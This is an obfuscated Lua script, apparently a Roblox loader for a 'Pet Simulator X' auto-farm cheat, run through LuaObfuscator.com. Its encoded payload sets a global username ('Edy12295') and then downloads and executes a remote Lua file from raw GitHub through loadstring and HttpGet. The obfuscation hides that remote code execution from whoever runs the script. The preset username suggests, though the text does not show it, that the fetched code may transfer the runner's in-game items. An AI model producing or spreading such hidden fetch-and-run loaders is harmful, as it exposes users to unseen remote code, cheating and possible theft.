--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.1) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v69=v2(v0(v20,16));if v19 then local v76=0;local v77;while true do if (v76==1) then return v77;end if (0==v76) then v77=v5(v69,v19);v19=nil;v76=1;end end else return v69;end end end);local function v21(v22,v23,v24)if v24 then local v70=(v22/((5 -3)^(v23-(1 -0))))%((2 + 0)^(((v24-(2 -1)) -(v23-(1 + 0))) + 1 + 0));return v70-(v70%(1 -0));else local v71=(2 + 0 + 0)^(v23-(1063 -(443 + 619)));return (((v22%(v71 + v71))>=v71) and (463 -(171 + 291))) or (0 -0);end end local function v25()local v38=1624 -(428 + 1196);local v39;while true do if (v38==(2 -1)) then return v39;end if (v38==(0 + 0)) then v39=v1(v16,v18,v18);v18=v18 + ((4 -2) -1);v38=2 -(1706 -(671 + 1034));end end end local function v26()local v40,v41=v1(v16,v18,v18 + (1297 -(206 + 1089)));v18=v18 + 2 + 0;return (v41 * (1657 -(382 + 1019))) + v40;end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + 3);v18=v18 + (10 -6);return (v45 * (39159024 -22381808)) + (v44 * (238872 -173336)) + (v43 * (20 + 236)) + v42;end local function v28()local v46=117 -(18 + 99);local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==((824 -(277 + 544)) -1)) then v51=v21(v48,72 -(133 -82),31);v52=((v21(v48,1304 -(303 + (2547 -(220 + 1358))))==(1 + 0)) and  -(1 + (296 -(62 + 234)))) or (3 -(2 -0));v46=8 -5;end if (v46==(349 -(103 + 245))) then v49=1 + (1653 -(1138 + 515));v50=(v21(v48,2 -1,(480 -(30 + 133)) -(67 + 171 + 59)) * ((1487 -(718 + 767))^(55 -23))) + v47;v46=2 + (0 -0);end if (v46==(0 + 0)) then v47=v27();v48=v27();v46=1 + 0;end if (v46==(693 -(42 + 648))) then if (v51==(0 + (0 -0))) then if (v50==(0 + 0)) then return v52 * (0 + 0);else v51=319 -(192 + (873 -(193 + 554)));v49=487 -(189 + 298);end elseif (v51==(7012 -4965)) then return ((v50==(608 -(317 + 291))) and (v52 * (1/(0 -0)))) or (v52 * NaN);end return v8(v52,v51-(1382 -(1557 -(583 + 615)))) * (v49 + (v50/(((10 -5) -(104 -(24 + 77)))^(178 -(38 + 88)))));end end end local function v29(v30)local v53=0 -0;local v54;local v55;while true do if ((0 -(617 -(48 + 569)))==v53) then v54=nil;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v53=568 -(236 + 331);end if (v53==(153 -(17 + 133))) then return v6(v55);end if (v53==(2 + 0 + 0)) then v55={};for v78=585 -(325 + 259), #v54 do v55[v78]=v2(v1(v3(v54,v78,v78)));end v53=(345 -(188 + 154)) -0;end if (v53==(1 + 0)) then v54=v3(v16,v18,(v18 + v30) -(2 -1));v18=v18 + v30;v53=5 -3;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v56=0 -0;local v57;local v58;local v59;local v60;local v61;local v62;local v63;local v64;while true do if (v56~=(2 -1)) then else v59=nil;v60=nil;v56=1 + 1;end if (v56==0) then v57=0;v58=nil;v56=2 -1;end if (v56==(300 -(169 + 128))) then local v72=0;while true do if (v72==0) then v63=nil;v64=nil;v72=1 + 0;end if ((1 + 0)==v72) then v56=4;break;end end end if (v56==4) then while true do if (v57==2) then local v95=0 -0;while true do if (v95==1) then v57=1 + 2;break;end if (v95==(0 -0)) then v62=nil;v63=nil;v95=1;end end end if (v57~=(1641 -(1146 + 492))) then else v64=nil;while true do local v103=0 -0;local v104;local v105;while true do if (v103==(1 + 0)) then while true do if (v104~=0) then else v105=1148 -(987 + 161);while true do if (v105~=(1 + 0)) then else if (v58~=(8 -5)) then else local v113=0 -0;local v114;while true do if (v113==(0 + 0)) then v114=0;while true do local v149=0;while true do if (v149~=0) then else if (v114==0) then local v169=1093 -(756 + 337);while true do if ((388 -(253 + 134))==v169) then v114=1;break;end if (v169~=0) then else for v188=1,v27() do v60[v188-1]=v33();end for v190=793 -(685 + 107),v27() do v61[v190]=v27();end v169=1 + 0;end end end if (v114~=(590 -(144 + 445))) then else return v62;end break;end end end break;end end end if (v58~=2) then else local v115=0;local v116;while true do if ((0 + 0)~=v115) then else v116=0;while true do if (v116==(1 -0)) then for v159=1 + 0,v27() do local v160=0;local v161;while true do if (v160==(0 -0)) then v161=v25();if (v21(v161,1,1)==0) then local v180=1203 -(1012 + 191);local v181;local v182;local v183;local v184;local v185;while true do if (0~=v180) then else v181=0;v182=nil;v180=2 -1;end if (v180==(1 + 0)) then v183=nil;v184=nil;v180=2;end if (v180==(3 -1)) then v185=nil;while true do if (v181~=(2 + 0)) then else while true do if (v182==1) then local v203=1633 -(223 + 1410);while true do if (v203~=1) then else v182=1 + 1;break;end if (0==v203) then v185={v26(),v26(),nil,nil};if (v183==(1410 -(865 + 545))) then local v214=0;local v215;while true do if ((0 + 0)~=v214) then else v215=0;while true do if (v215~=0) then else v185[13 -10]=v26();v185[4]=v26();break;end end break;end end elseif (v183==1) then v185[268 -(16 + 249)]=v27();elseif (v183==(139 -(68 + 69))) then v185[9 -6]=v27() -(2^(23 -7));elseif (v183==(1293 -(672 + 618))) then local v220=0;local v221;while true do if (v220==0) then v221=0;while true do if (v221==0) then v185[1 + 2]=v27() -(2^(1936 -(186 + 1734)));v185[4]=v26();break;end end break;end end end v203=771 -(308 + 462);end end end if (v182~=3) then else if (v21(v184,3,3)~=1) then else v185[18 -14]=v64[v185[4]];end v59[v159]=v185;break;end if (v182==2) then if (v21(v184,1,1)~=1) then else v185[2]=v64[v185[2]];end if (v21(v184,2,2)~=(1 + 0)) then else v185[926 -(798 + 125)]=v64[v185[3]];end v182=3;end if (v182==0) then local v205=0;while true do if (v205==0) then v183=v21(v161,2,3);v184=v21(v161,4 + 0,10 -4);v205=1674 -(520 + 1153);end if ((521 -(508 + 12))~=v205) then else v182=1 + 0;break;end end end end break;end if (1==v181) then local v198=0 + 0;while true do if (v198==(2 -1)) then v181=1875 -(637 + 1236);break;end if (v198==(0 -0)) then v184=nil;v185=nil;v198=3 -2;end end end if (v181==0) then local v199=0;while true do if (0==v199) then v182=1678 -(842 + 836);v183=nil;v199=1 -0;end if (v199==1) then v181=1;break;end end end end break;end end end break;end end end v58=3;break;end if (v116==0) then for v162=379 -(193 + 185),v63 do local v163=0;local v164;local v165;local v166;local v167;while true do if (0==v163) then v164=0;v165=nil;v163=1 + 0;end if (v163~=2) then else while true do if (v164==(1 + 0)) then v167=nil;while true do if (v165~=0) then else local v194=0;local v195;local v196;while true do if (1==v194) then while true do if (v195~=(0 + 0)) then else v196=0;while true do if (v196~=0) then else local v212=0;local v213;while true do if (v212==(0 + 0)) then v213=1628 -(629 + 999);while true do if (v213==1) then v196=1;break;end if (v213==0) then v166=v25();v167=nil;v213=1;end end break;end end end if (v196~=(1 + 0)) then else v165=1;break;end end break;end end break;end if (v194~=0) then else v195=0 + 0;v196=nil;v194=1 -0;end end end if (v165==1) then if (v166==1) then v167=v25()~=(574 -(436 + 138));elseif (v166==(2 + 0)) then v167=v28();elseif (v166~=(1003 -(550 + 450))) then else v167=v29();end v64[v162]=v167;break;end end break;end if (v164==(0 + 0)) then v165=0;v166=nil;v164=1987 -(1087 + 899);end end break;end if (v163==(69 -(44 + 24))) then v166=nil;v167=nil;v163=2;end end end v62[3]=v25();v116=1 + 0;end end break;end end end break;end if (v105~=(0 -0)) then else local v112=1499 -(536 + 963);while true do if (v112==1) then v105=1 + 0;break;end if (v112~=(0 -0)) then else if (0~=v58) then else local v140=1147 -(448 + 699);local v141;local v142;while true do if (v140~=1) then else while true do if ((0 -0)~=v141) then else v142=0 -0;while true do if (v142==1) then v61={};v58=2 -1;break;end if (v142~=0) then else local v186=0;local v187;while true do if ((311 -(239 + 72))~=v186) then else v187=0 + 0;while true do if ((0 -0)==v187) then v59={};v60={};v187=2 -1;end if (v187~=(1 + 0)) then else v142=1 + 0;break;end end break;end end end end break;end end break;end if ((231 -(18 + 213))~=v140) then else v141=766 -(644 + 122);v142=nil;v140=1;end end end if (v58==1) then local v143=0;local v144;while true do if (v143==(0 -0)) then v144=0 + 0;while true do if ((1076 -(954 + 122))==v144) then v62={v59,v60,nil,v61};v63=v27();v144=4 -3;end if (v144==1) then v64={};v58=7 -5;break;end end break;end end end v112=1;end end end end break;end end break;end if (v103==0) then v104=0 + 0;v105=nil;v103=963 -(137 + 825);end end end break;end if (0~=v57) then else local v96=0 + 0;while true do if (v96==1) then v57=1;break;end if (v96==0) then v58=0 + 0;v59=nil;v96=797 -(97 + 699);end end end if (v57~=(1528 -(399 + 1128))) then else local v97=0;local v98;while true do if (v97==(653 -(469 + 184))) then v98=0 + 0;while true do if (v98==0) then v60=nil;v61=nil;v98=1;end if (v98~=(1 + 0)) then else v57=6 -4;break;end end break;end end end end break;end if (v56==(2 + 0)) then v61=nil;v62=nil;v56=3;end end end local function v34(v35,v36,v37)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v35[1];v67=v35[2];v65=1;end if (v65==1) then v68=v35[3];return function(...)local v80=1;local v81= -1;local v82={...};local v83=v12("#",...) -1;local function v84()local v85=v66;local v86=v67;local v87=v68;local v88=v32;local v89={};local v90={};local v91={};for v99=0 + (0 -0),v83 do if (((4809 -((865 -(283 + 557)) + 574))>=(475 + 531)) and (v99>=v87)) then v89[v99-v87]=v82[v99 + (3 -2)];else v91[v99]=v82[v99 + (2 -1)];end end local v92=(v83-v87) + (2 -(901 -(645 + 255)));local v93;local v94;while true do local v100=(0 + 0) -0;local v101;while true do if ((v100==(0 + 0)) or ((7034 -5584)>=(15444 -10953))) then v101=0 + 0;while true do if ((v101==0) or ((8262 -4307)>=(4828 -((1609 -(767 + 448)) + 390)))) then local v110=1737 -(757 + 980);local v111;while true do if (((0 + 0)==v110) or ((3219 -1141)>=(7499 -4830))) then v111=478 -(247 + 231);while true do if ((1452<(1805 + 1489)) and (v111==(0 + 0))) then local v117=0 -0;while true do if (((1203 + 2742)<=(8384 -3869)) and (v117==(0 + 0))) then v93=v85[v80];v94=v93[(1679 -(415 + 247)) -(379 + 637)];v117=1 + 0;end if ((v117==(197 -(185 + 11))) or ((4176 -(186 + 34))==(6367 -2889))) then v111=3 -2;break;end end end if (((5895 -2219)==(2481 + 1195)) and (v111==(1 -0))) then v101=1;break;end end break;end end end if ((v101==(1 + 0)) or (4566>=4809)) then if ((2088>1659) and (v94<=((642 -(388 + 251)) + 2))) then if ((v94<=(4 -2)) or (3265>(6370 -((2454 -(275 + 894)) + 290)))) then if (((4701 -(23 + 204))>=(11248 -8917)) and (v94<=(1492 -(591 + 901)))) then v80=v93[658 -(6 + 649)];elseif ((v94>(1 -0)) or (186>2737)) then v91[v93[2]]();else local v128=(0 + 0) -0;local v129;local v130;local v131;while true do if (((2071 + 1238)>=969) and (v128==(0 -0))) then v129=0 -0;v130=nil;v128=1 + 0;end if (((6584 -2735)==(4052 -(36 + 167))) and (v128==(3 -2))) then v131=nil;while true do if ((v129==((456 + 306) -((397 -193) + 518 + 40))) or ((9827 -5905)==(11776 -7781))) then local v168=(212 -110) -((1356 -(446 + 851)) + 43);while true do if ((v168==(1 + 0)) or ((3025 -(905 + 440))>=(8388 -(4338 -(202 + 453))))) then v129=1;break;end if (((293 + 35 + 352)<(618 + 1592)) and (v168==((1827 -(188 + 1459)) -(78 + 102)))) then v130=0 -0;v131=nil;v168=25 -(19 + 5);end end end if (((4317 -(611 + 9))>(194 -64)) and (v129==1)) then while true do if ((3310>(2110 + 656)) and (v130==(0 -0))) then v131=v93[1 + 1];v91[v131]=v91[v131](v13(v91,v131 + 1,v81));break;end end break;end end break;end end end elseif ((v94<=(1767 -(253 + 1511))) or (294>(8770 -5246))) then v91[v93[2]]=v93[3 + 0];elseif ((v94>(1 + 3)) or ((3427 -(1143 + (834 -(195 + 467))))<=(2383 -(126 + 1205)))) then v91[v93[3 -1]]=v37[v93[12 -9]];else v91[v93[2]][v93[1967 -(351 + 1393 + 220)]]=v91[v93[542 -(197 + 341)]];end elseif (((4763 -(106 + 172 + 1542))>(248 + 1469)) and (v94<=8)) then if ((v94<=(891 -((1529 -914) + 270))) or (2010>=(9060 -4468))) then local v121=1983 -(917 + 1066);local v122;local v123;local v124;local v125;local v126;local v127;while true do if (((324 + 2594)<(2762 + 1160)) and ((3 + 0)==v121)) then while true do if (((1184 -755)<=(234 + 4622)) and (v122==(2 + 0))) then v127=nil;while true do if ((v123==(967 -(321 + 644))) or ((3526 -2114)<(427 -215))) then for v174=v124,v81 do local v175=0 -0;local v176;local v177;while true do if ((((13883 -10623) -2166)<=(4384 -(36 + 69))) and (v175==1)) then while true do if (((4316 -1566)==(4113 -(25 + 612 + 726))) and (v176==(38 -(4 + 34)))) then v177=0 -(0 + 0);while true do if (((13706 -(1858 + 8319))<=(4980 -(427 + 277))) and (v177==0)) then v127=v127 + (749 -(137 + 611)) + (1652 -(1044 + 608));v91[v174]=v125[v127];break;end end break;end end break;end if (((1613 + 1231)>(1488 -(817 + 133))) and (v175==(1324 -(502 + 822)))) then v176=0 + 0;v177=nil;v175=74 -(64 + 9);end end end break;end if ((4989>(493 -107)) and (v123==(0 + 0))) then local v170=0 + 0;local v171;while true do if (((2048 -626)==(138 + 1284)) and (v170==(0 + 0))) then v171=0 + 0;while true do if ((3878>(709 -(50 + 271))) and (0==v171)) then local v192=1293 -(617 + 676);while true do if ((2253<(14937 -10983)) and (v192==(1118 -(509 + 608)))) then v171=1026 -(701 + 324);break;end if (((4830 -(105 + (305 -214)))>(2960 -1213)) and (v192==(0 + 0))) then v124=v93[(1050 + 515) -(21 + 1542)];v125,v126=v88(v91[v124](v13(v91,v124 + 1,v93[360 -(178 + 179)])));v192=806 -(440 + 365);end end end if (((5585 -(822 + 94))>2174) and (v171==(169 -(66 + 102)))) then v123=(935 -(398 + 312)) -(147 + 77);break;end end break;end end end if ((v123==(760 -(497 + (1043 -781)))) or ((340 + 4591)<=2679)) then local v172=0;local v173;while true do if (((5942 -(812 + 848))==(4335 -(20 + 33))) and (v172==((0 + 0) -0))) then v173=0 -0;while true do if ((v173==(0 + 0)) or (738<=(64 + 74 + 141))) then local v193=147 -(132 + 15);while true do if (((1907 -(623 + 417))==(2983 -2116)) and ((0 -0)==v193)) then v81=(v126 + v124) -1;v127=(921 -(67 + 270)) -(161 + 423);v193=3 -2;end if (((4813 -(765 + 120))>=(2732 -1394)) and (v193==(1 + 0))) then v173=1;break;end end end if ((400<=4404) and ((707 -(499 + 207))==v173)) then v123=2;break;end end break;end end end end break;end if (((1670 + 2630)==4300) and (v122==(1 -0))) then v125=nil;v126=nil;v122=2;end if ((v122==((636 -(120 + 516)) + 0)) or ((1760 -(658 + 60))<=1013)) then local v158=0;while true do if (((8030 -3339)>=3505) and (v158==(0 -0))) then v123=674 -(558 + 116);v124=nil;v158=1;end if (((6259 -4946)>=(1002 -386)) and (v158==1)) then v122=(4 -2) -1;break;end end end end break;end if (((1938 + 2207)==(1884 + 2261)) and (v121==(0 + 0))) then v122=0 + 0;v123=nil;v121=1 + (1792 -(640 + 1152));end if (((3291 -1376)<=(6423 -2868)) and (v121==2)) then v126=nil;v127=nil;v121=3;end if (((2655 -(151 + 28))>(936 -(404 + 496))) and (v121==(3 -2))) then v124=nil;v125=nil;v121=1 + 1;end end elseif (((4715 -(943 + (1256 -676)))>3042) and (v94>(377 -(2 + 43 + 325)))) then if (((1876 -(358 + 706))<=(2266 + 1153)) and (v93[9 -7]==v91[v93[1 + 3]])) then v80=v80 + 1 + 0;else v80=v93[138 -(85 + 50)];end else local v136=(1707 -1190) -(175 + 342);local v137;local v138;while true do if (((1 -(0 -0))==v136) or ((3968 + 383)<(2417 -(177 + 109)))) then v91[v137 + 1]=v138;v91[v137]=v138[v93[4]];break;end if (((4238 -2047)<(7162 -2230)) and (v136==(0 + 0))) then v137=v93[1998 -(1850 + 146)];v138=v91[v93[1665 -(1612 + 50)]];v136=1 -0;end end end elseif ((1179<=(3115 -(226 + 52 + 211))) and (v94<=(24 -14))) then if (((980 + 2503)>(6249 -4024)) and (v94==((466 -(202 + 263)) + 8))) then v91[v93[1 + (3 -2)]]=v93[3 + 0]~=0;else do return;end end elseif ((654<=1217) and (v94==((1423 -652) -(564 + 196)))) then for v147=v93[929 -(578 + (2027 -(1098 + 580)))],v93[2 + 1] do v91[v147]=nil;end elseif ((v91[v93[389 -(200 + 187)]]==v93[4]) or (((9983 -7299) -(1545 + 83))<=(1383 -717))) then v80=v80 + (820 -(531 + 288)) + 0;else v80=v93[5 -2];end v80=v80 + ((703 + 290) -(750 + 242));break;end end break;end end end end A,B=v32(v11(v84));if  not A[1] then local v102=v35[4][v80] or "?";error("Script error at ["   .. v102   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end end end return v34(v33(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703083O00557365726E616D6503083O00456479312O323935030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100173O0012033O00014O000B000100013O000E080001000200013O00044O00020001001203000100013O00260C000100050001000100044O00050001001205000200023O001205000300043O001004000200030003001205000200053O001205000300063O002007000300030007001203000500084O0009000600014O0006000300064O000100023O00022O000200020001000100044O0016000100044O0005000100044O0016000100044O000200012O000A3O00017O00173O00023O00033O00053O00053O00063O00083O00083O00093O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
